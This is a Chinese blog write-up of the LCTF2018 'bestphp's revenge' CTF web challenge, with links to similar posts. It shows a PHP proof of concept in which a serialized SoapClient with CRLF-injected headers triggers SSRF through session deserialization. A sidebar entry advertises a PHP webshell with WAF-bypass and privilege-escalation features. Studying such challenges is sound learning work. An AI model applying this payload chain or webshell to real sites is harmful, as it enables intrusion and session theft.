bestphp reveng

最新推荐文章于 2022-11-30 17:54:37 发布
最新推荐文章于 2022-11-30 17:54:37 发布
阅读量494 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/106412873
版权

知识点:
利用soap触发ssrf
session反序列化
call_user_func的使用
源码如下:
#index.php

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

#flag.php

session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }

代码中的最后调用了$b函数,这肯定需要我们将$b替换成我们需要的函数,
extract可以满足我们这个需求。
我们的目的很明确,就是用本地地址去访问flag.php,然后再读取session中的flag。
这里再说一下call_user_func($b);如果传入的参数,是数组,且数组的第一个值是类名或者对象名的话,就会把数组的第二个值,当做方法,然后执行。
虽然没有现成的可利用的类,但是我们可以使用php原生类。
SoapClient
是一个php内置的类,当__call方法被触发后,它可以发送HTTP和HTTPS请求。该类的构造函数如下:

public SoapClient :: SoapClient (mixed $wsdl [array $options ]

如果我们传入call_user_func(array(‘SoapClient’,‘welcome_to_the_lctf2018’)),那么他就会调用SoapClient类的welcome_to_the_lctf2018方法,因为没有这个方法,所以就会自动调用__call()方法。完成发送http请求,

借鉴下其他大佬的poc

<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
    'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
    ?>

因为此时还是php引擎所以最后加|
在这里插入图片描述
访问完成之后会将我们刚才传的name中的值进行反序列化,生成soap类,即此时的session是个soap对象。
接下来就是去访问这个对象了,因为我们可以利用extract将b替换成我们想用的函数,所以可以通过 call_user_func()调用soapclient,并且触发他的__call方法访问flag.php
在这里插入图片描述
此时传过去的session中已经包含刚才访问flag,php中的内容了,用该session再次访问即可。
在这里插入图片描述

yu22x
关注
------已搬运-------BUUCTF:LCTFbestphp‘s revenge
Zero_Adam的博客
02-01 550
我弄这个题一整天了,晚上不出意外的话还得看,先这样吧。。 里面还有很多疑问点,希望能有大佬指点 要用到的很多很多的知识点,,, sesion反序列化–>soap(ssrf+crlf)–>call_user_func激活soap类(抄袭的,我哪能总结出来啊,,,) call_user_func函数 这个我自己总结的,看看 自己写的 extract extract()函数,从数组中把变量导入当前页面,相同的变量会被覆盖。 所以下面的b=extract,同时$POST是一个数组,所以符合 reset(
bestphp‘s revenge
m0_63045593的博客
04-22 344
bestphp’s revenge <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a = array(reset($_SESSION), 'welcome_to_th
bestphp's revenge
沐目的博客
11-08 2067
1.知识点 1.1 SoapClient(待完善) 这是一个php内置的类,当__call方法被触发后,它可以发送HTTP和HTTPS请求。具体的还不太懂,只知道它可以用来造成ssrf漏洞。 <?php $target = "http://127.0.0.1/flag.php"; $attack = new SoapClient(null,array('location' => $ta...
BMZCTF:Bestphp
末初的CSDN博客
04-25 1368
http://www.bmzclub.cn/challenges#Bestphp index.php <?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte
bestphp‘s revenge/ 安洵杯Babyphpphpsession题目)
qq_62046696的博客
11-30 1217
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
php
Best_Mr_Y的博客
01-16 590
PHP笔记三种打印方法变量在函数内如何访问全局变量php常量php数据类型判断数据类型字符串拼接字符串方法数组方法关联数组多维数组JSON循环 三种打印方法 echo 打印一个或多个字符串,字符串之间以分号分隔,以 点 . 进行字符串拼接 print 打印一个字符串 print_r 打印一个或多个字符串,字符串之间以分号分隔 变量 变量用$声明,后面紧跟变量名称 $a = 10; $b = 20; echo($a+$b); // 30 在函数内如何访问全局变量 借助结构global关键词 $a
ctf实验吧,后台登陆wp
qq_42728977的博客
07-29 415
暑假刷题系列: 看到这道题的界面大致判断是注入 输入’ or 1=1,无果后,看看源码吧,右键看源码,如下: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=...
BMZCTF 2018 安洵杯 boooooom
qq_26243045的博客
11-26 399
下载压缩包后发现360提示有加密的压缩文件,所以先用Advanced Archive Password Recovery爆破一下。 爆破出密码:3862 查看解压缩的password.py import base64 import hashlib f = open("password.txt",'r') password = f.readline() b64_str = base64.b64encode(password.encode('utf-8')) hash = hashlib.md5()
CTF题解五 Web PHP大法(实验吧)
LJFYYJ的博客
07-14 2381
实验吧题目链接:http://www.shiyanbar.com/ctf/54 首先,根据题目中提示,要注意备份文件。 点开题目链接后,最后有提示index.php.txt。于是进行访问。 采用的是GET方法,代表着之后可以用?id=XXX的方式进行测试。 程序的主要逻辑是,GET方法得到的id的值必须被hackerDJ所包含,却又在进行一次url解密后,与其相等。 这里涉及到P...
[LCTF]bestphp‘s revenge
qq_45691294的博客
09-25 870
知识点:session反序列化->soap(ssrf+crlf)->call_user_func激活soap类 题目直接提供了index.php和flag.php的源码 //index.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'
BestShell:世界上最好用的php大马
03-09
请勿用作非法用途! 具体介绍: ://yzddmr6.tk/2019/09/01/BestShell/ 代码开源排除后门,免杀自己做。 4.0更新日志 修复php7.0之后将不再支持与类名相同的构造方法的问题,支持php所有版本。 3.0更新日志 修复压缩功能(mmp改了好久) 支持单文件下载 改正错别字:登陆->登录 更新cmd命令集合,更方便 增加PHP执行命令的函数(proc_open,COM('Wscript.shell'),shellshock),可以在某些情况下绕过disable_function 2.0更新日志 去除后门 修复乱码问题 所有数据提交均采用base64方式,实测绕过waf udf提权自动加载路径,不用再选择@@ basedir了,并且修复了一个加载路径时的小bug 去除大马标题,防止谷歌黑客找马 从其他大马里移植了顶部函数
PHP反序列化总结
weixin_30444105的博客
07-10 806
之前遇到过很多次php反序列化相关的内容,总结一下。 (反)序列化给我们传递对象提供了一种简单的方法。serialize()将一个对象转换成一个字符串,unserialize()将字符串还原为一个对象,在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的PHP魔术方法: __construct: 在创建对象时候初始化对象,一般用于对变量赋...
bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
scrawman的博客
12-08 634
bestphp’s revenge 这道题的知识点还挺多的 源码文件有两个:index.php和flag.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a =
由浅入深剖析序列化攻击(一)
systemino的博客
05-06 631
前言 近期因为内部培训有序列化的需求,于是趁此机会由浅入深的剖析一下序列化相关内容。 之前也写过由浅入深的xml漏洞系列,欢迎阅读: https://skysec.top/2018/08/17/浅析xml及其安全问题/ https://skysec.top/2018/08/18/浅析xml之xinclude-xslt/ 序列化的概念 简单概括来说,序列化即保存对象在内存中的状态,也可以...
BUU刷题记录——3
weixin_43610673的博客
08-31 867
[SWPUCTF 2018]SimplePHP 可以上传到找不到上传的文件 http://05de1970-8bf0-44cd-ba69-44dd2d41c86a.node3.buuoj.cn/file.php?file=upload_file.php 直接就可以从?file读源码,还用伪协议试了半天不行。。。 先看下function.php的内容 看源码得知上传的文件在/upload/目录下 文件名只能是几种图片格式 主要代码在class.php <?php class
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4799
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
LCTF2018-bestphp‘s revenge
weixin_43610673的博客
06-19 519
<?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION);//打印出seesion的内容 $a = array(reset($_SESSION), 'welcome_to_the_lc
PHP代码/命令执行漏洞总结
坚持硬核
02-04 2391
由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并交由服务器端执行。 代码/命令注入攻击中Web服务器没有过滤类似system(),eval(),exec()等函数的传入参数是该漏洞攻击成功的最主要原因。 代码注入相关函数: 1.mixed eval(string code_str) eval() 把字符串作为PHP代码执行 code_str是PHP代码字符串 2.bool assert ( mixed $assertion [, string $description
基于C51单片机Proteu仿真实例及软件源码+文档说明 之-电子琴.zip
最新发布
09-19
基于C51单片机Proteu仿真实例及软件源码+文档说明 之-电子琴.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值